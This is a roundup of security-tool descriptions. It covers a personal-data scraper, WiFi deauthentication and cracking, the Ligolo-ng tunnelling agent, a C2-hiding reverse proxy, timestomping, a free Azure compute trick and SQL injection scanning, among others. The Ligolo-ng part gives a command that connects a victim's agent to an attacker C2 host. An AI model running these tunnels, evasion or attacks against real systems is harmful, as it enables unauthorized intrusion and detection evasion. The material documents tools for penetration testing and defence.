Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
Extracted Details:
Uscrapper extracts the following details from the provided website:
Email Addresses: Displays email addresses found on the website.
Social Media Links: Displays links to various social media platforms found on the website.
Author Names: Displays the names of authors associated with the website.
Geolocations: Displays geolocation information associated with the website.
Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.
Whats New?:
Uscrapper 2.0:
Introduced multiple modules to bypass anti-webscrapping techniques.
Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
Implemented Multithreading to make these processes faster.
-u URL, --url URL: Specify the URL of the website to extract details from.
-c INT, --crawl INT: Specify the number of links to crawl
-t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
-O, --generate-report: Generate a report file containing the extracted details.
-ns, --nonstrict: Display non-strict usernames during extraction.
Note:
Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.
The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.
To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.
Contribution:
Want a new feature to be added?
Make a pull request with all the necessary details and it will be merged after a review.
You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.
Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.
Installation
To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:
Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).
Defining Variables
To define variables, add them to the vars section of your workflow YAML file:
vars: VAR_NAME: value ANOTHER_VAR: another_value # Add more variables...
Referencing Variables in Commands
You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:
You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:
If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.
Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
Example
Example 1:
Here's an example of how you can define, reference, and supply variables in your workflow configuration:
This will override the default values and use the provided values for these variables.
Example 2:
Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:
The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.
Workflows
Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!
Inspiration
Inspiration of this project comes from Awesome taskfile project.
Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.
It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.
β Don't forget to put a star if you like the project!
Legal
Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.
Requirements
This software only works on linux and requires root privileges to run.
You will also need a wireless network card that supports monitor mode and packet injection.
AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.
How to use
Clone the project via git clone https://github.com/redhuntlabs/antisquat.
Install all dependencies by typing pip install -r requirements.txt.
Create a file named .openai-key and paste your chatgpt api key in there.
(Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your godaddy api key in there.
Create a file named βdomains.txtβ. Type in a line-separated list of domains youβd like to scan.
(Optional) Create a file named blacklist.txt. Type in a line-separated list of domains youβd like to ignore. Regular expressions are supported.
Run antisquat using python3.8 antisquat.py domains.txt
Examples:
Letβs say youβd like to run antisquat on "flipkart.com".
Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.
AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.
Test case:
A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py
Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.
If you'd like to know more about the tool, make sure to check out our blog.
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Features
Tun interface (No more SOCKS!)
Simple UI with agent selection and network information
Easy to use and setup
Automatic certificate configuration with Let's Encrypt
Performant (Multiplexing)
Does not require high privileges
Socket listening/binding on the agent
Multiple platforms supported for the agent
How is this different from Ligolo/Chisel/Meterpreter... ?
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
SYN are translated to connect() on remote
SYN-ACK is sent back if connect() succeed
RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
Nothing is sent if timeout
This allows running tools like nmap without the use of proxychains (simpler and faster).
Building & Usage
Precompiled binaries
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building Ligolo-ng
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go $ go build -o proxy cmd/proxy/main.go # Build for Windows $ GOOS=windows go build -o agent.exe cmd/agent/main.go $ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
Setup Ligolo-ng
Linux
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo $ sudo ip link set ligolo up
Windows
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).
Running Ligolo-ng proxy server
Start the proxy server on your Command and Control (C2) server (default port 11601):
When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
Using your own TLS certificates
If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.
The -ignore-cert option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Using Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged or -PE to avoid false positives.
Todo
Implement other ICMP error messages (this will speed up UDP scans) ;
Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
Find authentication (authn) and authorization (authz) security bugs in web application routes:
Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:
RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.
With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:
We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.
What is Raven
The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:
Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
Query Library: We created a library of pre-defined queries based on research conducted by the community.
Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.
Possible usages for Raven:
Scanner for your own organization's security
Scanning specified organizations for bug bounty purposes
Scan everything and report issues found to save the internet
Research and learning purposes
This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.
Why Raven
In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear β the model in which security is delegated to developers has failed. This has been proven several times in our previous content:
A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat β an artifact poisoning attack.
Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.
Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality β each exploitation can impact millions of victims.
It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.
Setup && Run
To get started with Raven, follow these installation instructions:
Step 1: Install the Raven package
pip3 install raven-cycode
Step 2: Setup a local Redis server and Neo4j database
options: -h, --help show this help message and exit --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting) --debug Whether to print debug statements, default: False --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --org-name ORG_NAME Organization name to download the workflows
options: -h, --help show this help message and exit --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting) --debug Whether to print debug statements, default: False --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --max-stars MAX_STARS Maximum number of stars for a repository --min-stars MIN_STARS Minimum number of stars for a repository, default : 1000
It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.
Future Research Work
Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.
Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode
If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.
If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.
BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.
The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.
BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.
Features
Secret Scanning
Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!
Sensitive File Checks
Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.
Dig Mode
Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.
Asset Extraction
Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.
Searching
The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
Requirements
The project is based on Azure Pipelines and requires the following to be able to run:
Azure Service Connection to a resource group as described in the Microsoft Docs
Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and make it accessible to the pipelines
Optional
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Design
Infrastructure
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Deploy Azure services:
Key Vault
Log Analytics Workspace
Data Connection Endpoint
Data Connection Rule
Generate SSH keypair and password for the Windows account and store in the Key Vault
Create a Windows 11 VM
Install OpenSSH
Configure and deploy the SSH public key
Install Invoke-AtomicRedTeam
Install Microsoft Defender for Endpoint and configure exceptions
Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:
T1059.003
T1027,T1049,T1003
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
There are currently two ways to run the simulation:
A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.
TODO
Must have
Check if pre-reqs have been fullfilled before executing the atomic
Provide the ability to import own group policy
Cleanup biceps and pipelines by using a master template (Complete build)
Build pipeline that runs technique sequently with reboots in between
Add Azure ServiceConnection to variables instead of parameters
Nice to have
MDE Off-boarding (?)
Automatically join and leave AD domain
Make Atomics repository configureable
Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
Add C2 infrastructure for manual or C2 based simulations
Issues
Atomics do not return if a simulation succeeded or not
A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.
Change timestamps for individual files or directories.
Recursively apply timestamps to all files in a directory.
Option to use specific credentials for remote paths or privileged files.
I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.
Tool for analyzing SAP Secure Network Communications (SNC).
How to use?
In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.
SAP Router
SAP Routers can either support SNC or not, a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan find out if it is activated:
sncscan -H 10.3.161.4 -S 3299 -p router
DIAG / SAP GUI
The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailled overview of the system parameterss that can be read with sncscan and impact the connections security is in the section Background
Requirements: Currently the sncscan only works with the pysap libary from our fork.
python3 -m pip install -r requirements.txt
or
python3 setup.py test
python3 setup.py install
Background: SNC system parameters
SNC Basics
SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection, that can be applied for an SNC secured connection:
Authentication only: Verifies the identity of the communication partners
Confidentiality protection: Encrypts the transmitted messages
SNC Parameter
Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:
snc/data_protection/min: Minimum security level required for SNC connections.
snc/data_protection/max: highest security level, initiated by the SAP system
snc/data_protection/use: default security level, initiated from the SAP system
Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.
Reading out SNC Parameters
As long as a SAP System is addressed that is capable of sending SNC messages, it also responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.
MELEE: A Tool to Detect Ransomware Infections in MySQL Instances
Attackers are abusing MySQL instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MySQL instances and triggering infections at scale to exfiltrate data, destruct data, and extort money via ransom. For example one of the significant threats MySQL deployments face is ransomware. We have authored a tool named "MELEE" to detect potential infections in MySQL instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected MySQL instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases. In this release of the tool, the following modules are supported:
Nemesis is an offensive data enrichmentpipeline and operator support system.
Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.
Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operatorsβ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.
Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!
We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.
This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.
Visit our website - secureci.org for more information.
Features
Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.
Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.
Usage
This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.
This would run the script in repo mode on the master branch of the specified repository.
How to use
Argus can be run inside a docker container. To do so, follow the steps:
Install docker and docker-compose
apt-get -y install docker.io docker-compose
Clone the release branch of this repo
git clone <>
Build the docker container
docker-compose build
Now you can run argus. Example run:
docker-compose run argus --mode {mode} --url {url to target repo}
Results will be available inside the results folder
Viewing SARIF Results
You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.
Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.
VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.
Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.
Troubleshooting
If there is an issue with needing the Github authorization for running, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all the requests made to Github. Note, we do not store this information anywhere, neither create any thing in the Github account - we only use this for cloning the repositories.
Contributions
Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!
Cite Argus
If you use Argus in your research, please cite our paper:
@inproceedings{muralee2023Argus, title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions}, author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck, A. Kapravelos, A. Machiry}, booktitle={32st USENIX Security Symposium (USENIX Security 23)}, year={2023}, }
navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities
Techniques
Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:
Heuristics
navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
Brute-force
navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.
Installation
git clone https://github.com/Hakai-Offsec/navgix; cd navgix; go build
Optional Arguments: /threads - specify maximum number of parallel threads (default=25) /dc - specify domain controller to query (if not ran on a domain-joined host) /domain - specify domain name (if not ran on a domain-joined host) /ldap - query hosts from the following LDAP filters (default=all) :all - All enabled computers with 'primary' group 'Domain Computers' :dc - All enabled Domain Controllers (not read-only DCs) :exclude-dc - All enabled computers that are not Domain Controllers or read-only DCs :servers - All enabled servers :servers-exclude-dc - All enabled servers excluding Domain Controllers or read-only DCs /ou - specify LDAP OU to query enabled computer objects from ex: "OU=Special Servers,DC=example,DC=local" /stealth - list share names without performing read/write access checks /filter - list of comma-separated shares to exclude from enumeration default: SYSVOL,NETLOGON,IPC$,PRINT$ /outfile - specify file for shares to be appended to instead of printing to std out /verbose - return unauthorized shares
BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.
The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.
For more information on tool usage, you may visit project's wiki.
Features
Highly configurable and customizable filters pipeline with boolean-based concatenation of rules will be able to hide your infrastructure from the most keen blue eyes.
Easily extendable project structure, everyone can add rules for their own C2.
Integrated and curated massive blacklist of IPv4 pools and ranges known to be associated with IT Security vendors combined with IP filter to disallow them to use/attack your infrastructure.
Malleable C2 Profile parser is able to validate inbound HTTP(s) traffic against the Malleable's config and reject invalidated packets.
Out of the box domain fronting support allows you to hide your infrastructure a little bit more.
Ability to check the IPv4 address of request against IP Geolocation/reverse lookup data and compare it to specified regular expressions to exclude out peers connecting outside allowed companies, nations, cities, domains, etc.
All incoming requests may be allowed/disallowed for any time period, so you may configure work time filters.
Support for multiple proxies with different filter pipelines at one BounceBack instance.
Verbose logging mechanism allows you to keep track of all incoming requests and events for analyzing blue team behaviour and debug issues.
Rules
BounceBack currently supports the following filters:
Faradayβs researchers Javier Aguinaga and Octavio Gianatiempo have investigated on IP cameras and two high severity vulnerabilities.
This research project began when Aguinaga's wife, a former Research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, opted for a more unconventional approach to tackle the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.
They uncovered two LAN remote code execution vulnerabilities in EZVIZβs implementation of Hikvisionβs Search Active Devices Protocol (SADP) and SDK server:
CVE-2023-34551: EZVIZβs implementation of Hikvisionβs SDK server post-auth stack buffer overflows (CVSS3 8.0 - HIGH)
The affected code is present in several EZVIZ products, which include but are not limited to:
Product Model
Affected Versions
CS-C6N-B0-1G2WF
Versions below V5.3.0 build 230215
CS-C6N-R101-1G2WF
Versions below V5.3.0 build 230215
CS-CV310-A0-1B2WFR
Versions below V5.3.0 build 230221
CS-CV310-A0-1C2WFR-C
Versions below V5.3.2 build 230221
CS-C6N-A0-1C2WFR-MUL
Versions below V5.3.2 build 230218
CS-CV310-A0-3C2WFRL-1080p
Versions below V5.2.7 build 230302
CS-CV310-A0-1C2WFR Wifi IP66 2.8mm 1080p
Versions below V5.3.2 build 230214
CS-CV248-A0-32WMFR
Versions below V5.2.3 build 230217
EZVIZ LC1C
Versions below V5.3.4 build 230214
These vulnerabilities affect IP cameras and can be used to execute code remotely, so they drew inspiration from the movies and decided to recreate an attack often seen in heist films. The hacker in the group is responsible for hijacking the cameras and modifying the feed to avoid detection. Take, for example, this famous scene from Oceanβs Eleven:
Exploiting either of these vulnerabilities, Javier and Octavio served a victim an arbitrary video stream by tunneling their connection with the camera into an attacker-controlled server while leaving all other camera features operational.
A deep detailed dive into the whole research process, can be found in these slides and code. It covers firmware analysis, vulnerability discovery, building a toolchain to compile a debugger for the target, developing an exploit capable of bypassing ASLR. Plus, all the details about the Hollywood-style post-exploitation, including tracing, in memory code patching and manipulating the execution of the binary that implements most of the camera features.
This research shows that memory corruption vulnerabilities still abound on embedded and IoT devices, even on products marketed for security applications like IP cameras. Memory corruption vulnerabilities can be detected by static analysis, and implementing secure development practices can reduce their occurrence. These approaches are standard in other industries, evidencing that security is not a priority for embedded and IoT device manufacturers, even when developing security-related products. By filling the gap between IoT hacking and the big screen, this research questions the integrity of video surveillance systems and hopes to raise awareness about the security risks posed by these kinds of devices.
Execute code within Azure Automation service without getting charged
Description
CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.
This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.
Each execution is limited to 3 hours
Requirements
Python 3.8+ with the libraries mentioned in the file requirements.txt
CloudMiner - Free computing power in Azure Automation Service
optional arguments: -h, --help show this help message and exit --path PATH the script path (Powershell or Python) --id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a utomationAccounts/{automationAccountName} -c COUNT, --count COUNT number of executions -t TOKEN, --token TOKEN Azure access token (optional). If not provided, token will be retrieved using the Azure CLI -r REQUIREMENTS, --requirements REQUIREMENTS Path to requirements file to be installed and use by the script (relevant to Python scripts only) -v, --verbose Enable verbose mode
Example usage
Python
Powershell
License
CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.
SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality.
options: -h, --help show this help message and exit -u URL, --url URL Single URL for the target -r URLS_FILE, --urls_file URLS_FILE File containing a list of URLs -p, --pipeline Read from pipeline --proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080) --payload PAYLOAD File containing malicious payloads (default is payloads.txt) --single-payload SINGLE_PAYLOAD Single payload for testing --discord DISCORD Discord Webhook URL --headers HEADERS File containing headers (default is headers.txt) --threads THREADS Number of threads
Running SqliSniper
Single Url Scan
The url can be provided with -u flag for single site scan
./sqlisniper.py -u http://example.com
File Input
The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.
./sqlisniper.py -r url.txt
piping URLs
The SqliSniper can also worked with the pipeline input with -p flag
cat url.txt | ./sqlisniper.py -p
The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.
While using the custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.
SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.
Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection it is recommended to use lower thread for more accurate detection.
SqliSniper is made inΒ pythonΒ with lots of <3 by @Muhammad Danial.
Essential utilities for pentester, bug-bounty hunters and security researchers
secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).
The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!
Essential utilities for pentester, bug-bounty hunters and security researchers
